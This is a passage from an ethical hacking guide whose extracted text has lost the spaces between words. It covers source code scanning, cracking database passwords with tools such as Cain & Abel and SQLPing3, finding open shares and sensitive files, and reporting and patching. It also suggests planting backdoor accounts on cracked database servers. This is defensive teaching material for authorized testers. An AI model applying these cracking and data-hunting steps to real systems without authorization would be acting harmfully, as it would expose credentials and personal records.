AnalyzingsourcecodeSoftwaredevelopmentiswheremanysoftwaresecurityholesbeginandshouldendbutrarelydo.Ifyoufeelconfidentinyoursecuritytestingeffortstothispoint,youcandigdeepertofindsecurityflawsinyoursourcecode—thingsthatmightneverbediscoveredbytraditionalscannersandhackingtechniquesbutthatareproblemsnonetheless.Fearnot!It’sactuallymuchsimplerthanitsounds.No,youwon’thavetogothroughthecodelinebylinetoseewhat’shappening.Youdon’tevenneeddevelopmentexperience(althoughitdoeshelp).
Todothis,youcanuseastaticsourcecodeanalysistool,suchasthoseofferedbyKlocwork(www.klocwork.com)andCheckmarx(www.checkmarx.com).Checkmarx’sCxSuiteisastandalonetoolthat’sreasonablypricedandverycomprehensiveinitstestingofbothwebapplicationsandmobileapps—somethingthat’shardtofindamongsourcecodeanalysisvendors.
AsshowninFigure15-11,withCxSuite,yousimplyloadtheEnterpriseClient,login
totheapplication(defaultcredentialsareadmin@cx/admin),runtheCreateScanWizardtopointittothesourcecodeandselectyourscanpolicy,clickNext,clickRun,andyou’reoffandrunning.
Figure15-11:UsingCxSuitetodoananalysisofanopensourceAndroidmobileapp.
Whenthescancompletes,youcanreviewthefindingsandrecommendedsolutions,asshowninFigure15-12.
Figure15-12:ReviewingtheresultsofanopensourceAndroide-mailapp.
Asyoucansee,whatwasseeminglyasafeandsecuree-mailappdoesn’tappeartobeallthat.Youneverknowuntilyoucheckthesourcecode!
CxDeveloperisprettymuchallyouneedtoanalyzeandreportonvulnerabilitiesinyourC#,Java,andmobilesourcecodebundledintoonesimplepackage.Checkmarx,likeafewothers,alsooffersacloud-basedsourcecodeanalysisservice.Ifyoucangetoveranyhurdlesassociatedwithuploadingyoursourcecodetoathirdpartyinthecloud,thesecanofferamoreefficientandmostlyhands-freeoptionforsourcecodeanalysis.
Sourcecodeanalysiswilloftenuncoverdifferentflawsthantraditionalwebandmobilesecuritytesting.Ifyouwantthemostcomprehensiveleveloftesting,doboth.Theextralevelofchecksofferedbysourceanalysisisbecomingmoreandmoreimportantwithmobileapps.Theseappsareoftenfullofsecurityholesthatmanynewersoftwaredevelopersdidn’tlearnaboutinschool.IcoveradditionalmobileflawsinChapter11.
Thebottomlinewithwebapplicationandmobileappsecurityisthatifyoucanshowyourdevelopersandqualityassuranceanalyststhatsecuritybeginswiththem,youcanreallymakeadifferenceinyourorganization’soverallinformationsecurity.
UncoveringMobileAppFlawsInadditiontorunningatoolsuchasCxSuitetocheckformobileappvulnerabilities,thereareseveralotherthingsyou’llwanttolookforincluding:
Cryptographicdatabasekeysthatarehard-codedintotheappImproperhandlingofsensitiveinformationsuchasstoringpersonally-identifiableinformation(a.k.a.PII)locallywheretheuserandotherappscanaccessitLoginweaknesses,suchasbeingabletogetaroundloginpromptsAllowingweak,orblank,passwords
Notethatthesechecksaremostlyuncoveredviamanualanalysisandmayrequiretoolssuchaswirelessnetworkanalyzers,forensicstools,andwebproxiesthatItalkaboutinChapter9andChapter11,respectively.AswithIoT,theimportantthingisthatyou’retestingthesecurityofyourmobileapps.Betterforyoutofindtheflawsthanforsomeoneelse!
DatabasesandStorageSystemsInThisChapter
Testingandexploitingdatabaseflaws
Findingstorageweaknesses
Ferretingoutsensitiveinformation
Counteringdatabaseandstorageabuse
Attacksagainstdatabasesandstoragesystemscanbeveryseriousbecausethat’swhere“thegoods”arelocated,andthosewithillintentarewellawareofthat.TheseattackscanoccuracrosstheInternetorontheinternalnetworkwhenexternalattackersandmaliciousinsidersexploitanynumberofvulnerabilities.TheseattackscanalsooccurviathewebapplicationthroughSQLinjection.
DivingIntoDatabasesDatabasesystems,suchasMicrosoftSQLServer,MySQL,andOracle,havelurkedbehindthescenes,buttheirvalueandtheirvulnerabilitieshavefinallycometotheforefront.Yes,eventhemightyOraclethatwasonceclaimedtobeunhackableissusceptibletoexploitssimilartoitscompetition.Withtheslewofregulatoryrequirementsgoverningdatabasesecurity,hardlyanybusinesscanhidefromtherisksthatliewithinbecausepracticallyeverybusiness(largeandsmall)usessomesortofdatabaseeitherin-houseorhostedinthecloud.
ChoosingtoolsAswithwirelessnetworks,operatingsystems,andsoon,youneedgoodtoolsifyou’regoingtofindthedatabasesecurityissuesthatcount.Thefollowingaremyfavoritetoolsfortestingdatabasesecurity:
AdvancedSQLPasswordRecovery(www.elcomsoft.com/asqlpr.html)forcrackingMicrosoftSQLServerpasswordsCain&Abel(www.oxid.it/cain.html)forcrackingdatabasepasswordhashesNexpose(www.rapid7.com/products/nexpose)forperformingin-depthvulnerabilityscansSQLPing3(www.sqlsecurity.com/downloads)forlocatingMicrosoftSQLServersonthenetwork,checkingforblankpasswordsforthe‘sa’account(thedefaultSQLServersystemadministrator),andperformingdictionarypassword-crackingattacks
Youcanalsouseexploittools,suchasMetasploit,foryourdatabasetesting.
FindingdatabasesonthenetworkThefirststepindiscoveringdatabasevulnerabilitiesistofigureoutwherethey’relocatedonyournetwork.Itsoundsfunny,butmanynetworkadminsI’vemetaren’tevenawareofvariousdatabasesrunningintheirenvironments.ThisisespeciallytrueforthefreeSQLServerExpressdatabasesoftwareeditionsthatanyonecandownloadandrunonyournetwork.
Ican’ttellyouhowoftenIfindsensitiveproductiondata,suchascreditcardandSocialSecuritynumbers,beingusedintestdatabasesthatarecompletelywideopentoabusebycuriousinsidersorevenexternalattackersthathavemadetheirwayintothenetwork.Usingsensitiveproductiondataintheuncontrolledareasofthenetworksuchassales,softwaredevelopment,andqualityassurance(QA)isadatabreachwaitingtohappen.
ThebesttoolI’vefoundtodiscoverMicrosoftSQLServersystemsisSQLPing3,whichisshowninFigure16-1.
Figure16-1:SQLPing3canfindSQLServersystemsandcheckformissingsaaccountpasswords.
SQLPing3canevendiscoverinstancesofSQLServerhiddenbehindpersonalfirewalls,suchasWindowsFirewall.ThisisanicefeatureasWindowsFirewallisenabledbydefaultonWindows7andup.
IfyouhaveOracleinyourenvironment,PeteFinniganhasagreatlistofOracle-centricsecuritytoolsatwww.petefinnigan.com/tools.htmthatcanperformfunctionssimilartoSQLPing3.
CrackingdatabasepasswordsSQLPing3alsoservesasanicedictionary-basedSQLServerpassword-crackingprogram.AsyousawinFigure16-1,itchecksforblanksapasswordsbydefault.AnotherfreetoolforcrackingSQLServer,MySQL,andOraclepasswordhashesisCain&Abel,showninFigure16-2.
Figure16-2:UsingCain&AbeltocrackOraclepasswordhashes.
YousimplyloadCain&Abel,clicktheCrackertabatthetop,selectOracleHashesatthebottomleft,andclicktheblueplussymbolatthetoptoloadausernameandpasswordhashtostartthecracking.YoucanalsoselectOracleTNSHashesatthebottomleftandattempttocaptureTransportNetworkSubstratehashesoffthewirewhencapturingpacketswithCain.YoucandothesameforMySQLpasswordhashes.
ThecommercialproductElcomSoftDistributedPasswordRecovery(www.elcomsoft.com/edpr.html)canalsocrackOraclepasswordhashes.IfyouhaveaccesstoSQLServermaster.mdffiles(whichareoftenreadilyavailableonthenetworkduetoweakshareandfilepermissionsasIoutlinelaterinthischapter),youcanuseElcomSoft’sAdvancedSQLPasswordRecovery(www.elcomsoft.com/asqlpr.html)torecoverdatabasepasswordsimmediately.
YoumightstumbleacrosssomelegacyMicrosoftAccessdatabasefilesthatarepasswordprotectedaswell.Noworries:ThetoolAdvancedOfficePasswordRecovery(www.elcomsoft.com/acpr.html)cangetyourightin.
Asyoucanimagine,thesepassword-crackingtoolsareagreatwaytodemonstratethemostbasicofweaknessesinyourdatabasesecurity.It’salsoanicewaytounderscoretheproblemswithcriticalfilesscatteredacrossthenetworkinanunprotectedfashion.
AnothergoodwaytodemonstrateSQLServerweaknessesistouseMicrosoftSQLServer2008ManagementStudioExpress(www.microsoft.com/en-us/download/details.aspx?id=7593)toconnecttothedatabasesystemsyounowhavethepasswordsforandsetupbackdooraccountsorbrowsearoundtosee(andshow)what’savailable.InpracticallyeveryunprotectedSQLServersystemIcome
across,there’ssensitivepersonalfinancialorhealthcareinformationavailableforthetaking.
ScanningdatabasesforvulnerabilitiesAswithoperatingsystemsandwebapplications,somedatabase-specificvulnerabilitiescanberootedoutonlybyusingtherighttools.IuseNexposetofindsuchissuesas:
BufferoverflowsPrivilegeescalationsPasswordhashesaccessiblethroughdefault/unprotectedaccountsWeakauthenticationmethodsenabled
Agreatall-in-onecommercialdatabasevulnerabilityscannerforperformingin-depthdatabasechecks—includinguserrightsauditsonSQLServer,Oracle,andsoon—isAppDetectivePRO(www.trustwave.com/Products/Database-Security/AppDetectivePRO).AppDetectivePROcanbeagoodadditiontoyoursecuritytestingtoolarsenalifyoucanjustifytheinvestment.
Manyvulnerabilitiescanbetestedfrombothanunauthenticatedoutsider’sperspectiveaswellasatrustedinsider’sperspective.Theimportantthingistoreviewthesecurityofyourdatabasesfromasmanyanglesasreasonablypossible.AsI’vesaidbefore,ifit’soutthereandaccessible,peoplearegoingtoplaywithit.
FollowingBestPracticesforMinimizingDatabaseSecurityRisks
Keepingyourdatabasessecureisactuallyprettysimpleifyoudothefollowing:
Runyourdatabasesondedicatedservers(orworkstations,wherenecessary).Checktheunderlyingoperatingsystemsforsecurityvulnerabilities.IcoveroperatingsystemexploitsforWindowsandLinuxinChapters12and13,respectively.Ensurethatyourdatabasesfallwithinthescopeofpatchingandsystemhardening.Requirestrongpasswordsoneverydatabasesystem.Mostenterprise-readydatabasessuchasOracleandSQLServerallowyoutousedomainauthentication(suchasActiveDirectoryorLDAP)soyoucanjusttie-inyourexistingdomainpolicyanduseraccountsandnothavetoworryaboutmanagingaseparateset.Useappropriatefileandsharepermissionstokeeppryingeyesaway.De-identifyanysensitiveproductiondatabeforeit’susedinnon-productionenvironmentssuchasdevelopmentorQA.CheckyourwebapplicationsforSQLinjectionandrelatedinputvalidationvulnerabilities.(IcoverwebapplicationsecurityinChapter15.)Useanetworkfirewall,suchasthoseavailablefromFortinet(www.fortinet.com)orCisco(www.cisco.com),anddatabase-specificcontrols,suchasthoseavailablefromImperva(www.imperva.com)andIdera(www.idera.com).PerformrelateddatabasehardeningandmanagementusingatoolsuchasMicrosoftSecurityComplianceManager(http://technet.microsoft.com/en-us/library/cc677002.aspx).Runthelatestversionofdatabaseserversoftware.ThenewsecurityfeaturesinSQLServer2012andSQLServer2016aregreatadvancementstowardbetterdatabasesecurity.
OpeningUpAboutStorageSystemsAttackersarecarryingoutagrowingnumberofstorage-relatedhacksandusevariousattackvectorsandtoolstobreakintothestorageenvironment.(SurelyyouknowwhatI’mgoingtosaynext.)Therefore,youneedtogettoknowthetechniquesandtoolsyourselfandusethemtotestyourownstorageenvironment.
TherearealotofmisconceptionsandmythsrelatedtothesecurityofsuchstoragesystemsasFibreChannelandiSCSIStorageAreaNetworks(SANs),CIFSandNFS-basedNetworkAttachedStorage(NAS)systems,andsoon.Manynetworkandstorageadministratorsbelievethat“EncryptionorRAIDequalsstoragesecurity,”“Anexternalattackercan’treachourstorageenvironment,”“Oursystemsareresilient,”or“Securityishandledelsewhere.”Theseareallverydangerousbeliefs,andI’mconfidentthatmoreattackswilltargetcriticalstoragesystems.
Aswithdatabases,practicallyeverybusinesshassomesortofnetworkstoragehousingsensitiveinformationthatitcan’taffordtolose.That’swhyit’simportanttoincludebothnetworkstorage(SANandNASsystems)andtraditionalfilesharesinthescopeofyoursecuritytesting.
ChoosingtoolsThesearemyfavoritetoolsfortestingstoragesecurity:
nmap(http://nmap.org)forportscanningtofindlivestoragehostsSoftPerfectNetworkScanner(www.softperfect.com/products/networkscanner)forfindingopenandunprotectedsharesFileLocatorPro(www.mythicsoft.com)Nexposeforperformingin-depthvulnerabilityscans
FindingstoragesystemsonthenetworkToseekoutstorage-relatedvulnerabilities,youhavetofirstfigureoutwhat’swhere.Thebestwaytogetrollingistouseaportscannerand,ideally,anall-in-onevulnerabilityscanner,suchasNexposeorLanGuard.Also,giventhatmanystorageservershavewebserversbuiltin,youcanusesuchtoolsasAcunetixWebVulnerabilityScannerandNetsparkertouncoverweb-basedflaws.Youcanusethesevulnerabilityscannerstogaingoodinsightintoareasthatneedfurtherinspection,suchasweakauthentication,unpatchedoperatingsystems,cross-sitescripting,andsoon.
Acommonlyoverlookedstoragevulnerabilityisthatmanystoragesystemscanbeaccessedfromboththede-militarizedzone(DMZ)segmentandtheinternalnetworksegment(s).Thisvulnerabilityposesriskstobothsidesofthenetwork.BesuretomanuallychecktoseeifyoucanreachtheDMZfromtheinternalnetworkandviceversa.
Youcanalsoperformbasicfilepermissionandsharescans(asoutlinedinChapter12)inconjunctionwithatextsearchtooltouncoversensitiveinformationthateveryoneonthenetworkshouldnothaveaccessto.Diggingdownfurther,aquickmeansforfindingopennetworksharesistouseSoftPerfectNetworkScanner’ssharescanningcapabilitiesasshowninFigure16-3.
Figure16-3:UsingSoftPerfectNetworkScannertosearchfornetworkshares.
AsyoucanseeinFigure16-3,NetworkScannerenablesyoutoperformasecurityandsecuritypermissionscanforalldevicesorsimplyfolders.IrecommendselectingSpecificaccountintheAuthenticationsectionshowninFigure16-3andthenclickManagesoyoucanenteradomainaccountforthenetworkthathasgeneraluserpermissions.Thiswillprovideagoodlevelofaccesstodeterminewhichsharesareaccessible.
OnceNetworkScannerhascompleteditsscan,thesharesshowingEveryoneintheSharedFolderSecuritycolumnpointsyoutothesharesthatneedattention.HardlyasecurityassessmentgoesbywithoutcomingacrosssuchsharesopentotheWindowsEveryonegroup.Justascommonistoseethedirectoriesandfileswithintheseshares
thatarealsobeaccessibletoanylogged-inWindowsusertoopen,modify,delete—whatevertheyplease.How’sthatforaccountability!?
RootingoutsensitivetextinnetworkfilesOnceyoufindopennetworkshares,you’llthenwanttoscanforsensitiveinformationstoredinfilessuchasPDFs,.docx,and.xlsxfiles.It’sassimpleasusingatextsearchutility,suchasFileLocatorProorEffectiveFileSearch(www.sowsoft.com/search.htm).Alternatively,youcanuseWindowsExplorerorthefindcommandinLinuxtoscanforsensitiveinformation,butit’sjusttooslowandcumbersomeformyliking.
You’llbeamazedatwhatyoucomeacrossstoredinsecurelyonusers’desktops,servershares,andmore,suchas:
EmployeehealthrecordsCustomercreditcardnumbersCorporatefinancialreportsSourcecodeMasterdatabasefiles(asImentionedearlier)
Thesky’sthelimit.Suchsensitiveinformationshouldnotonlybeprotectedbygoodbusinesspractices,butisalsogovernedbystate,federal,andinternationalregulationsseehavetomakesurethatyoufinditandsecureit.
Doyoursearchesforsensitivetextwhileyou’reloggedintothelocalsystemordomainasaregularuser—notasanadministrator.Thiswillgiveyouabetterviewofregularuserswhohaveunauthorizedaccesstosensitivefilesandsharesthatyouthoughtwereotherwisesecure.Whenusingabasictextsearchtool,suchasFileLocatorPro,lookforthefollowingtextstrings:
DOB(fordatesofbirth)SSN(forSocialSecuritynumbers)License(fordriver’slicenseinformation)CreditorCCV(forcreditcardnumbers)
Don’tforgetaboutyourmobiledeviceswhenseekingsensitive,unprotectedinformation.EverythingfromlaptopstoUSBdrivestoexternalharddrivesisfairgametothebadguys.Amisplacedorstolensystemisallittakestocreateacostlydatabreach.
Thepossibilitiesforinformationexposureareendless;juststartwiththebasicsandonlypeekintocommonfilesthatyouknowmighthavesomejuicyinfointhem.Limitingyoursearchtothesefileswillsaveyouatonoftime!
.txt
.docand.docx
.rtf
.xlsand.xlsx
AnexampleofabasictextsearchusingFileLocatorProisshowninFigure16-4.Notethefilesfoundindifferentlocationsontheserver.
Figure16-4:UsingFileLocatorProtosearchforsensitivetextonunprotectedshares.
FileLocatorProalsohastheabilitytosearchforcontentinsidePDFfilestouncoversensitivedata.
Tospeedtheprocess,youcanuseSensitiveDataManager,areallyneattooldesignedfortheverypurposeofscanningstoragedevicesforsensitive,personallyidentifiableinformation.ItcanalsosearchinsidebinaryfilessuchasPDFs.
Forasecondroundoftesting,youcouldperformyoursearchesloggedinasanadministrator.You’relikelytofindalotofsensitiveinformationscatteredabout.Itmightseemworthlessatfirst;however,thiscanhighlightsensitiveinformationstoredinplacesitshouldn’tbeorthatnetworkadministratorsshouldn’thaveaccessto.
Testingishighlydependentontiming,searchingfortherightkeywords,andlookingattherightsystemsonthenetwork.Youlikelywon’trootouteverysinglebitofsensitiveinformation,butthiseffortwillshowyouwherecertainproblemsare,whichwillhelpyoutojustifytheneedforstrongeraccesscontrolsandbetterITandsecuritymanagementprocesses.
FollowingBestPracticesforMinimizingStorageSecurityRisks
Likedatabasesecurity,storagesecurityisnotbrainsurgery.Keepingyourstoragesystemssecureisalsosimpleifyoudothefollowing:
Checktheunderlyingoperatingsystemsforsecurityvulnerabilities.IcoveroperatingsystemexploitsforWindowsandLinuxinChapters12and13.Ensurethatyournetworkstorage(SANandNASsystems)fallswithinthescopeofpatchingandsystemhardening.Requirestrongpasswordsoneverystoragemanagementinterface.Useappropriatefileandsharepermissionstokeeppryingeyesaway.Educateyourusersonwheretostoresensitiveinformationandtherisksofmishandlingit.De-identifyanysensitiveproductiondatabeforeit’susedindevelopmentorQA.Therearetoolsmadeforthisspecificpurpose.Useanetworkfirewall,suchasthoseavailablefromFortinet(www.fortinet.com)orWatchGuardTechnologies(www.watchguard.com)toensureonlythepeopleandsystemsthatneedtoaccessyourstorageenvironmentcandosoandnothingmore.
FivePiecesofInformationEverySecurityReportMustHave
Date(s)thetestingwasperformedTeststhatwereperformedSummaryofthevulnerabilitiesdiscoveredPrioritizedlistofvulnerabilitiesthatneedtobeaddressedRecommendationsandspecificstepsonhowtoplugthesecurityholesfound
Learnhowtokeepupyoursecuritytestingmomentumatwww.dummies.com/extras/hacking.
Inthispart…Nowthatthehard—oratleasttechnical—stuffisoverwith,it’stimetopulleverythingtogether,fixwhat’sbroken,andestablishgoodinformationsecuritypracticestohelpyoumoveforward.
First,thispartcoversreportingthesecurityvulnerabilitiesyoudiscovertohelpgetmanagementbuy-inandhopefullymoremoneyinyourbudgettomakethingsright.Thispartthencoversgoodpracticesforpluggingthesecurityholeswithinyoursystems.Finally,thispartcoverswhatittakestomanagechangewithinyourinformationsystemsforlong-termsuccess,includingoutsourcingethicalhackingtohelpeasetheburdenofyourmassiveto-dolist!That’swhatworkingininformationsecurityisallaboutanyway,right?
ReportingYourResultsInThisChapter
Bringingyourtestdatatogether
Categorizingvulnerabilitiesyoudiscover
Documentingandpresentingtheresults
Ifyou’rewishingforabreakaftertesting,nowisn’tthetimetorestonyourlaurels.Thereportingphaseofyoursecurityassessmentisoneofthemostcriticalpieces.Thelastthingyouwanttodoistorunyourtests,findsecurityproblems,andleaveitatthat.Putyourtimeandefforttogoodusebythoroughlyanalyzinganddocumentingwhatyoufindtoensurethatsecurityvulnerabilitiesareeliminatedandyourinformationismoresecureasaresult.Reportingisanessentialelementoftheongoingvigilancethatinformationsecurityandriskmanagementrequires.
Reportingincludessiftingthroughallyourfindingstodeterminewhichvulnerabilitiesneedtobeaddressedandwhichonesdon’treallymatter.Reportingalsoincludesbriefingmanagementoryourclientonthevarioussecurityissuesyoufind,aswellasgivingspecificrecommendationsformakingimprovements.Yousharetheinformationyou’vegatheredandgivetheotherpartiesguidanceonwheretogofromthere.Reportingalsoshowsthatthetime,effort,andmoneyinvestedinthesecuritytestswereputtogooduse.
PullingtheResultsTogetherWhenyouhavegobsoftestdata—fromscreenshotsandmanualobservationsyoudocumentedtodetailedreportsgeneratedbythevariousvulnerabilityscannersyouused—whatdoyoudowithitall?Youneedtogothroughyourdocumentationwithafine-toothedcombandhighlightalltheareasthatstandout.Baseyourdecisionsonthefollowing:
VulnerabilityrankingsfromyourassessmenttoolsYourknowledgeasanIT/securityprofessionalThecontextofthevulnerabilityandhowitactuallyimpactsthebusiness
Sothatyoucanfindoutmoreinformationaboutthevulnerability,manyfeature-richsecuritytoolsassigneachvulnerabilityaranking(basedonoverallrisk),explainthevulnerability,givepossiblesolutions,andincluderelevantlinkstothefollowing:vendorsites,theCommonVulnerabilitiesandExposureswebsiteathttp://cve.mitre.org,andtheNationalVulnerabilitiesDatabaseathttps://nvd.nist.gov.Forfurtherresearch,youmightalsoneedtoreferenceyourvendor’ssite,othersupportsites,andonlineforumstoseewhetherthevulnerabilityaffectsyourparticularsystemandsituation.Overallbusinessriskisyourmainfocus.
Inyourfinalreportdocument,youmightwanttoorganizethevulnerabilitiesasshowninthefollowinglist:
NontechnicalfindingsSocialengineeringvulnerabilitiesPhysicalsecurityvulnerabilitiesITandsecurityoperationsvulnerabilities
TechnicalfindingsNetworkinfrastructureOperatingsystemsFirewallrulebasesDatabasesWebapplicationsMobileappsMobiledevices
Forfurtherclarity,youcancreateseparatesectionsinyourreportforinternaland
externalsecurityvulnerabilitiesaswellashighandmoderatepriority.Onefinalnote:it’sgenerallyagoodideatovetyourfindingswithsystemownersfirsttoensurethatthey’reactuallyvalid.
PrioritizingVulnerabilitiesPrioritizingthesecurityvulnerabilitiesyoufindiscriticalbecausemanyissuesmightnotbefixable,andothersmightnotbeworthfixing.Youmightnotbeabletoeliminatesomevulnerabilitiesbecauseofvarioustechnicalreasons,andyoumightnotbeabletoaffordtoeliminateothers.Or,simplyenough,yourbusinessmayhaveacertainlevelofrisktolerance.Everysituationisdifferent.Youneedtofactorwhetherthebenefitisworththeeffortandcost.Ontheotherhand,spendingafewweeksworthofdevelopmenttimetofixcross-sitescriptingandSQLinjectionvulnerabilitiescouldbeworthalotofmoney,especiallyifyouendupgettingdingedbythird-partiesorlosepotentialcustomers.Thesamegoesformobiledevicesthateveryoneswearscontainnosensitiveinformation.Youneedtostudyeachvulnerabilitycarefully,determinethebusinessrisk,andweighwhethertheissueisworthfixing.
It’simpossible—oratleastnotworthtrying—tofixeveryvulnerabilitythatyoufind.Analyzeeachvulnerabilitycarefullyanddetermineyourworst-casescenarios.Soyouhavecross-siterequestforgery(CSRF)onyourprinter’swebinterface?What’sthebusinessrisk?PerhapsFTPisrunningonnumerousinternalservers.What’sthebusinessrisk?Formanysecurityflaws,you’lllikelyfindtheriskisjustnotthere.
I’vefoundthatwithsecurity—likemostareasoflife—youhavetofocusonyourhighestpayofftasks.Otherwise,you’lldriveyourselfnutsandprobablywon’tgetveryfarinmeetingyourowngoals.Here’saquickmethodtousewhenprioritizingyourvulnerabilities.Youcantweakthismethodtoaccommodateyourneeds.Youneedtoconsidertwomajorfactorsforeachofthevulnerabilitiesyoudiscover:
Likelihoodofexploitation:Howlikelyisitthatthespecificvulnerabilityyou’reanalyzingwillbetakenadvantageofbyahacker,amalicioususer,malware,orsomeotherthreat?Impactifexploited:Howdetrimentalwoulditbeifthevulnerabilityyou’reanalyzingwereexploited?
Manypeopleoftenskiptheseconsiderationsandassumethateveryvulnerabilitydiscoveredhastoberesolved.Bigmistake.Justbecauseavulnerabilityisdiscovereddoesn’tmeanitappliestoyourparticularsituationandenvironment.Ifyougoinwiththemindsetthateveryvulnerabilitywillbeaddressedregardlessofcircumstances,you’llwastealotofunnecessarytime,effort,andmoney,andyoucansetupyoursecurityassessmentprogramforfailureinthelongterm.However,becarefulnottoswingtoofarintheotherdirection!Manyvulnerabilitiesdon’tappeartooseriousonthesurfacebutcouldverywellgetyourorganizationintohotwaterifthey’reexploited.Digindeepandusesomecommonsense.
Rankeachvulnerability,usingcriteriasuchasHigh,Medium,andLowora1-through-5rating(where1isthelowestpriorityand5isthehighest)foreachofthetwoconsiderations.Table17-1showsasampletableandarepresentativevulnerabilityforeachcategory.
Table17-1PrioritizingVulnerabilities
HighLikelihood MediumLikelihood LowLikelihood
HighImpact
Sensitiveinformationstoredonanunencryptedlaptop
Tapebackupstakenoffsitethatarenotencryptedand/orpasswordprotected
NoadministratorpasswordonaninternalSQLServersystem
MediumImpact
Unencryptede-mailscontainingsensitiveinformationbeingsent
MissingWindowspatchonaninternalserverthatcanbeexploitedusingMetasploit
NopasswordsrequiredonseveralWindowsadministratoraccounts
LowImpact
OutdatedvirussignaturesonastandalonePCdedicatedtoInternetbrowsing
Employeesorvisitorsgainingunauthorizednetworkaccess
Weakencryptionciphersbeingusedonamarketingwebsite
ThevulnerabilityprioritizationshowninTable17-1isbasedonthequalitativemethodofassessingsecurityrisks.Inotherwords,it’ssubjective,basedonyourknowledgeofthesystemsandvulnerabilities.Youcanalsoconsideranyriskratingsyougetfromyoursecuritytools—justdon’trelysolelyonthem,becauseavendorcan’tprovideultimaterankingsofvulnerabilities.
CreatingReportsYoumayneedtoorganizeyourvulnerabilityinformationintoaformaldocumentformanagementorforyourclient.Thisisnotalwaysthecase,butit’softentheprofessionalthingtodoandshowsthatyoutakeyourworkseriously.Ferretoutthecriticalfindingsanddocumentthemsothatotherpartiescanunderstandthem.
Graphsandchartsareaplus.Screencapturesofyourfindings—especiallywhenit’sdifficulttosavethedatatoafile—addanicetouchtoyourreportsandshowtangibleevidencethattheproblemexists.
Documentthevulnerabilitiesinaconcise,nontechnicalmanner.Everyreportshouldcontainthefollowinginformation:
Date(s)thetestingwasperformedTeststhatwereperformedSummaryofthevulnerabilitiesdiscoveredPrioritizedlistofvulnerabilitiesthatneedtobeaddressedRecommendationsandspecificstepsonhowtoplugthesecurityholesfound
ItalwaysaddsvalueifyoucanperformanoperationalassessmentofIT/securityprocesses.Irecommendaddingalistofgeneralobservationsaroundweakbusinessprocesses,management’ssupportofITandsecurity,andsoonalongwithrecommendationsforaddressingeachissue.Youcanlookatthisassortofarootcauseanalysis.
Mostpeoplewantthefinalreporttoincludeasummaryofthefindings—noteverything.Thelastthingmostpeoplewanttodoissiftthrougha600pagePDFfilecontainingtechnicaljargonthatmeansverylittletothem.Manyconsultingfirmshavebeenknowntochargemegabucksforthisverytypeofreport.Andtheygetawaywithit.Butthatdoesn’tmakeitright.
Administratorsanddevelopersneedtherawdatareportsfromthesecuritytools.Thatway,theycanreferencethedatalaterwhentheyneedtoseespecificHTTPrequests/responses,detailsonmissingpatches,andsoon.
Aspartofthefinalreport,youmightwanttodocumentbehaviorsyouobservewhencarryingoutyoursecuritytests.Forexample,areemployeescompletelyobliviousorevenbelligerentwhenyoucarryoutanobvioussocialengineeringattack?DoestheITorsecuritystaffcompletelymisstechnicaltip-offs,suchastheperformanceofthe
networkdegradingduringtestingorvariousattacksappearinginsystemlogfiles?Youcanalsodocumentothersecurityissuesyouobserve,suchashowquicklyITstafformanagedserviceprovidersrespondtoyourtestsorwhethertheyrespondatall.Followingtherootcauseanalysisapproach,anymissing,incomplete,ornotfollowedproceduresneedtobedocumented.
Guardthefinalreporttokeepitsecurefrompeoplewhoarenotauthorizedtoseeit.Asecurityassessmentreportandtheassociateddataandsupportingfilesinthehandsofacompetitor,hacker,ormaliciousinsidercouldspelltroublefortheorganization.Herearesomewaystopreventthisfromhappening:
Deliverthereportandassociateddocumentationandfilesonlytothosewhohaveabusinessneedtoknow.Ifsendingthefinalreportelectronically,encryptallattachments,suchasdocumentationandtestresultsusinganencryptedZipformat,orsecurecloudfile-sharingservice.
PluggingSecurityHolesInThisChapter
Determiningwhichvulnerabilitiestoaddressfirst
Patchingyoursystems
Lookingatsecurityinanewlight
Afteryoucompleteyourtests,youwanttoheaddowntheroadtogreatersecurity.However,youfoundsomesecurityvulnerabilities—thingsthatneedtobeaddresses.(Ihopenottoomanyseriousones,though!)Pluggingthesesecurityholesbeforesomeoneexploitsthemisgoingtorequirealittleelbowgrease.Youneedtocomeupwithyourgameplananddecidewhichsecurityvulnerabilitiestoaddressfirst.Afewpatchesmightbeinorderandpossiblyevensomesystemhardening.Youmayneedtopurchasesomenewsecuritytechnologiesandmightwanttoreevaluateyournetworkdesignandsecurityinfrastructureaswell.Itouchonsomeofthecriticalareasinthischapter.
TurningYourReportsintoActionItmightseemthatthesecurityvulnerabilitytoaddressfirstwouldbeobvious,butit’softennotveryclear.Whenreviewingthevulnerabilitiesthatyoufind,considerthefollowingvariables:
HowcriticalthevulnerablesystemisWhatsensitiveinformationorbusinessprocessesareatstakeWhetherthevulnerabilitycanbefixedHoweasythevulnerabilityistofixWhetheryoucantakethesystemofflinetofixtheproblemWhattime,money,andeffortisinvolvedinpurchasingnewhardwareorsoftwareorretoolingbusinessprocessestoplugtheholes
InChapter17,Icoverthebasicissuesofdetermininghowimportantandhowurgentthesecurityproblemis.Infact,Iprovidereal-worldexamplesinTable17-1.Youshouldalsolookatsecurityfromatimemanagementperspectiveandaddresstheissuesthatarebothimportant(highimpact)andurgent(highlikelihood).Youprobablydon’twanttotrytofixthevulnerabilitiesthatarejusthighimpactorjusthighlikelihood.Youmighthavesomehighimpactvulnerabilitiesthat,likely,willneverbeexploited.Likewise,youprobablyhavesomevulnerabilitieswithahighlikelihoodofbeingexploitedthat,iftheyareexploited,won’treallymakeabigdifferenceinyourbusinessoryourjob.Thistypeofhumananalysisandperspectivewillhelpyoustandoutfromthescanandruntypeassessmentsthanmanypeopleperform(ofteninthenameofsomecomplianceregulation)andkeepyouemployedforsometimetocome!
Focusontaskswiththehighestpayofffirst—thosethatarebothhighimpactandhighlikelihood.Thiswilllikelybetheminorityofyourvulnerabilities.Afteryouplugthemostcriticalsecurityholes,youcangoafterthelessimportantandlessurgenttaskswhentimeandmoneypermit.Forexample,afteryouplugsuchcriticalholesasSQLinjectioninwebapplicationsandmissingpatchesonimportantservers,youmightwanttoreconfigureyourbackupswithpasswords,ifnotstrongencryption,tokeeppryingeyesawayincaseyourbackupsfallintothewronghands.
PatchingforPerfectionDoyoueverfeellikeallyoudoispatchyoursystemstofixsecurityvulnerabilities?Ifyouransweryestothisquestion,goodforyou—atleastyou’redoingit!Ifyouconstantlyfeelpressuretopatchyoursystemstherightwaybutcan’tseemtofindtime—atleastit’sonyourradar.ManyITprofessionalsandtheirmanagersdon’teventhinkaboutproactivelypatchingtheirsystemsuntilafterabreachoccurs.JustlookattheresearchintheVerizonDataBreachInvestigationsReport(amongothers).Patchmanagementisahugesecurityfailureacrossorganizationsinallindustries.Ifyou’rereadingthisbook,you’reobviouslyconcernedaboutsecurityandarehopefullywaypastthat.
